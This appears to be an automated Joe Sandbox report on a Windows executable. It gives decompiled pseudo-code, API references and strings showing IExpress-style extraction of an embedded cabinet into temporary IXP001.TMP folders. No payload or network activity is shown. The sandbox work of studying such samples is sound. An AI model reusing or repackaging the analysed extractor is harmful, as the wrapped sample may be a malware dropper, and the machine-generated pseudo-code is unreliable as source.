0x0094585e
0x00945811
0x00945817
0x00945819
0x0094581f
0x00000000
0x0094581f
0x00945791
0x00945797
0x0094579c
0x0094579e
0x00000000
0x009457a0
0x009457a9
0x009457ae
0x009457b0
0x00000000
0x00000000
0x00000000
0x00000000
0x009457b0
0x0094579e
0x00000000
0x00000000
0x00000000
0x00945769
0x00945762
0x00945753
0x0094574f
0x00000000
0x00000000
0x00000000
0x0094572e
0x00000000
0x00945864
0x00945864
0x00945864
0x00945717
0x00000000
0x009456c3
0x009456c5
0x009456c9
0x009456ce
0x009456d0
0x00000000
0x009456d6
0x009456d6
0x009456d8
0x009456dd
0x009456df
0x00000000
0x009456e1
0x009456e2
0x009456e4
0x009456e6
0x009456eb
0x009456ed
0x00000000
0x009456f3
0x009456f3
0x00000000
0x0094586c
0x00945878
0x0094587e
0x00945882
0x00945883
0x00945889
0x0094588e
0x0094588e
0x00000000
0x00945896
0x009456ed
0x009456df
0x009456d0
0x009456c1
0x009456a8
0x0094565b
0x0094565b
0x0094565d
0x00945669
0x00945669
0x0094565f
0x0094565f
0x00945665
0x00945667
0x00000000
0x00000000
0x00945667
0x0094566c
0x00945673
0x00945678
0x0094567a
0x0094589b
0x0094589b
0x00945680
0x00945685
0x0094568c
0x00000000
0x0094568c
0x0094567a
0x0094560e
0x00945613
0x0094561a
0x00945620
0x00945626
0x00000000
0x00945626
0x009455db
0x009455e0
0x009455e7
0x009455f1
0x009455f6
0x009455f6
0x009455f6
0x009458b7
0x009458c7

APIs

Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 009455CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00945638
LocalFree.KERNEL32(00000000), ref: 0094564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00945620

Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554

Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 009456B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0094571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00945737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 009457CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 009457EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00945802

Part of subcall function 00942630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00942654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00945830

Part of subcall function 00946517: FindResourceA.KERNEL32(00940000,000007D6,00000005), ref: 0094652A
Part of subcall function 00946517: LoadResource.KERNEL32(00940000,00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00946538
Part of subcall function 00946517: DialogBoxIndirectParamA.USER32(00940000,00000000,00000547,009419E0,00000000), ref: 00946557
Part of subcall function 00946517: FreeResource.KERNEL32(00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00946560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00945878

Part of subcall function 0094597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009459A8
Part of subcall function 0094597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 009459AF

Strings

RUNPROGRAM, xrefs: 009455BD, 00945600
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 009456AE, 009456B3, 0094583D
msdownld.tmp, xrefs: 009457D3
Z, xrefs: 0094570A
A:\, xrefs: 009456F4
<None>, xrefs: 00945632

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-2692175070
Opcode ID: f85f294f7960396fd595c1d423bb553776e84f775db0ce1c512c22da7ef84b6b
Instruction ID: 3e75d24d56aefee9c5c3b112e76da0573e8c851f304681dab012e756b4f71d6b
Opcode Fuzzy Hash: f85f294f7960396fd595c1d423bb553776e84f775db0ce1c512c22da7ef84b6b
Instruction Fuzzy Hash: EE812975A08A049BDB20ABB48C85FFF73AD9BA6344F460066F586D2192EF748DC1CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0094597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0094597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x948004; // 0xec518a5e
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x949124 = E00946285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E009444B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x949a34 & 0x00000008;
							if(( *0x949a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x949a38; // 0x0
								_t110 =  *((intOrPtr*)(0x9489e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x949124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0094268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x949a38; // 0x0
							_t110 =  *((intOrPtr*)(0x9489e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x9489e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x949a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E009444B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x949124 = E00946285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E009444B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x949124 = E00946285();
					_t66 = 0;
					L33:
					return E00946CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0094597d
0x00945988
0x0094598f
0x0094599a
0x009459a6
0x009459a8
0x009459af
0x009459b9
0x009459dd
0x009459e4
0x009459f1
0x009459fe
0x00945a0b
0x00945a13
0x00945a19
0x00945a1b
0x00945ba1
0x00945baf
0x00945bbd
0x00945bd8
0x00945bde
0x00945be3
0x00945bec
0x00945bf0
0x00945bfc
0x00945c02
0x00945c02
0x00945c02
0x00945c04
0x00945c04
0x00000000
0x00945c04
0x00945a27
0x00945a3a
0x00945a46
0x00945a48
0x00945a4a
0x00000000
0x00000000
0x00945a64
0x00945a6a
0x00945a6c
0x00945abc
0x00945ac2
0x00945ac9
0x00945aca
0x00945aca
0x00945acc
0x00945acc
0x00945acf
0x00945ad1
0x00000000
0x00000000
0x00945ad3
0x00945ad6
0x00945ad8
0x00000000
0x00000000
0x00945ada
0x00945adc
0x00945add
0x00945add
0x00945ae0
0x00000000
0x00000000
0x00000000
0x00945ae0
0x00945ae2
0x00945ae4
0x00945ae6
0x00945ae6
0x00945ae6
0x00945ae9
0x00945aeb
0x00945af0
0x00945af6
0x00945af8
0x00945af9
0x00945af9
0x00945afb
0x00000000
0x00000000
0x00945afd
0x00945aff
0x00945b00
0x00945b03
0x00000000
0x00000000
0x00000000
0x00945b03
0x00945b05
0x00945b08
0x00945b20
0x00945b27
0x00945b52
0x00945b52
0x00945b5b
0x00945b62
0x00945b6b
0x00945b6d
0x00945b76
0x00945b7d
0x00945b83
0x00945b7f
0x00945b7f
0x00945b7f
0x00945b6f
0x00945b72
0x00945b72
0x00945b85
0x00945b98
0x00945b9e
0x00945b87
0x00945b8f
0x00945b8f
0x00000000
0x00945b85
0x00945b29
0x00945b33
0x00000000
0x00000000
0x00945b35
0x00945b48
0x00945b4a
0x00000000
0x00945b4a
0x00945b0f
0x00945b16
0x00000000
0x00945b16
0x00945a7c
0x00945a8a
0x00945aa5
0x00945aab
0x00000000
0x009459bb
0x009459c0
0x009459c7
0x009459d1
0x009459d6
0x00945c05
0x00945c14
0x00945c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009459A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 009459AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00945A13
MulDiv.KERNEL32(?,?,00000400), ref: 00945A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00945A64
memset.MSVCRT ref: 00945A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00945A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00945AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00945BFC

Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554

Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: ebc552df4301a7ae9ca12e62eff3d1f81838d83cda4e3ffe2a36ba323641255b
Instruction ID: db0f5a25b9a9d403e29a7aefa5191673ec0d1b2c8b558c5423776099b5806faf
Opcode Fuzzy Hash: ebc552df4301a7ae9ca12e62eff3d1f81838d83cda4e3ffe2a36ba323641255b
Instruction Fuzzy Hash: BF71C1B591420CAFEB25DFA0CC85FFB77ACEB49304F0545A9F445D2141EA748E84CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00944FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00944FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x949144 = E0094468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x949140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x948584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x948584, 0x841), 5); // executed
				}
				_t10 = E00944EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00944CA0, E00944CC0, E00944980, E00944A50, E00944AD0, E00944B60, E00944BC0, 1, 0x949148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x949148; // 0x0
						_t24 =  *0x948584; // 0x0
						E009444B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x941140, 0, E00944CD0, 0, 0x949140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x948584; // 0x0
					E009444B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x949140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x949140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x9491d8; // 0x0
						if(_t47 == 0) {
							E009444B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x948a38 & 0x00000001) == 0 && ( *0x949a34 & 0x00000001) == 0) {
						SendMessageA( *0x948584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00944fe0
0x00944fe6
0x00944ff9
0x0094500d
0x00945013
0x0094501a
0x00945163
0x00945163
0x00945020
0x00945027
0x00945037
0x00945051
0x00945051
0x00945057
0x0094505e
0x009450a7
0x009450ad
0x009450b4
0x009450e8
0x009450e8
0x009450ee
0x009450ff
0x00945104
0x00945106
0x00000000
0x00945106
0x009450cd
0x009450d3
0x009450da
0x00000000
0x00000000
0x009450dd
0x009450e6
0x00000000
0x00000000
0x00000000
0x00945060
0x00945060
0x00945070
0x00945075
0x00945107
0x00945107
0x0094510e
0x00945111
0x00945117
0x00945117
0x0094511f
0x00945121
0x00945127
0x00945135
0x00945135
0x00945127
0x00945141
0x00945159
0x00945159
0x00000000
0x0094515f

APIs

Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00944FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00945006
LockResource.KERNEL32(00000000), ref: 0094500D
GetDlgItem.USER32(00000000,00000842), ref: 00945030
ShowWindow.USER32(00000000), ref: 00945037
GetDlgItem.USER32(00000841,00000005), ref: 0094504A
ShowWindow.USER32(00000000), ref: 00945051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00945111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00945159

Strings

*MEMCAB, xrefs: 009450C7
CABINET, xrefs: 00944FE6, 00944FF7

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: e0be1ea5cedb66f89c432dd8a49b5c179aa3342aba62c38fcfda91e270a20842
Instruction ID: e11108dce719a20755720ee7a271b59f746d9c335174fa6af3dd11286c03e7ab
Opcode Fuzzy Hash: e0be1ea5cedb66f89c432dd8a49b5c179aa3342aba62c38fcfda91e270a20842
Instruction Fuzzy Hash: 193107B879C7017FE7305BA1AC89F6B379CA78FB4DF050024F901A21A2DAB4CC00A665

Uniqueness

Uniqueness Score: -1.00%

Function 009453A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E009453A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x948004; // 0xec518a5e
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0094171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00941680(_t32, 0x104, _t20);
					E0094658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00946CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x948a20 = 1;
				goto L5;
			}

0x009453ac
0x009453b3
0x009453b9
0x009453bb
0x009453bd
0x009453bf
0x009453d1
0x009453d6
0x009453e0
0x009453e2
0x009453f5
0x009453fb
0x00945402
0x0094540b
0x00000000
0x00000000
0x00945413
0x00000000
0x00000000
0x00945415
0x00945416
0x00945427
0x0094542a
0x0094542b
0x00945434
0x00945434
0x0094543a
0x0094544c
0x0094544c
0x00945452
0x0094545a
0x00000000
0x00000000
0x0094545e
0x0094545f
0x00000000

APIs

Part of subcall function 0094171E: _vsnprintf.MSVCRT ref: 00941750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 009453FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945452

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 009453B7, 009453E1, 0094541E
IXP, xrefs: 00945419
IXP%03d.TMP, xrefs: 009453C0

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2414463295
Opcode ID: 97dccd76411d3a89dde376f99a271563767ae54f76567e350a70ba032ff512a0
Instruction ID: 5a1129eb548aa29d9629030b74766fcc58e8abd2f07fb575acfe30c04a4988b9
Opcode Fuzzy Hash: 97dccd76411d3a89dde376f99a271563767ae54f76567e350a70ba032ff512a0
Instruction Fuzzy Hash: 2611207535860467E320AF769C49FEF376DEFC7321F000129F646D22A1CE748D8286A2

Uniqueness

Uniqueness Score: -1.00%

Function 00945467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00945467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x948004; // 0xec518a5e
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x9491e4;
					_t42 = 0x104;
					E00941680(0x9491e4, 0x104);
					L14:
					_t13 = E009458C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x949124 = 0;
							_t14 = 1;
							L24:
							return E00946CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0094597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x948a20; // 0x0
						if(_t61 != 0) {
							 *0x948a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x949124 = E00946285();
						goto L22;
					}
					 *0x948a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E009453A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x9491e4;
				E00941781(0x9491e4, 0x104, __ecx,  &_v268);
				if(( *0x949a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0094658A(_t48, 0x104, 0x941140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0094658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00945472
0x00945479
0x00945481
0x00945484
0x0094551c
0x00945521
0x00945528
0x0094552d
0x0094552f
0x00945539
0x0094554d
0x0094554d
0x00945552
0x00945585
0x00945585
0x0094558b
0x0094558d
0x0094559d
0x0094559d
0x00945557
0x0094555e
0x00000000
0x00000000
0x00945560
0x00945566
0x00945569
0x0094556f
0x0094556f
0x00945581
0x00945581
0x00000000
0x00945581
0x00945545
0x0094557c
0x00000000
0x0094557c
0x00945547
0x00000000
0x00945547
0x0094548a
0x00945490
0x00945497
0x00000000
0x00000000
0x0094549d
0x009454ab
0x009454b4
0x009454c0
0x0094550c
0x00945511
0x00945515
0x00000000
0x00945515
0x009454c9
0x009454d6
0x009454d8
0x009454fe
0x00945503
0x00945507
0x00000000
0x00945507
0x009454da
0x009454dd
0x009454f7
0x00000000
0x009454f7
0x009454df
0x009454e2
0x009454f0
0x00000000
0x009454f0
0x009454e7
0x00000000
0x00000000
0x009454e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 009454C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094556F

Part of subcall function 009453A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 009453FB
Part of subcall function 009453A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945402
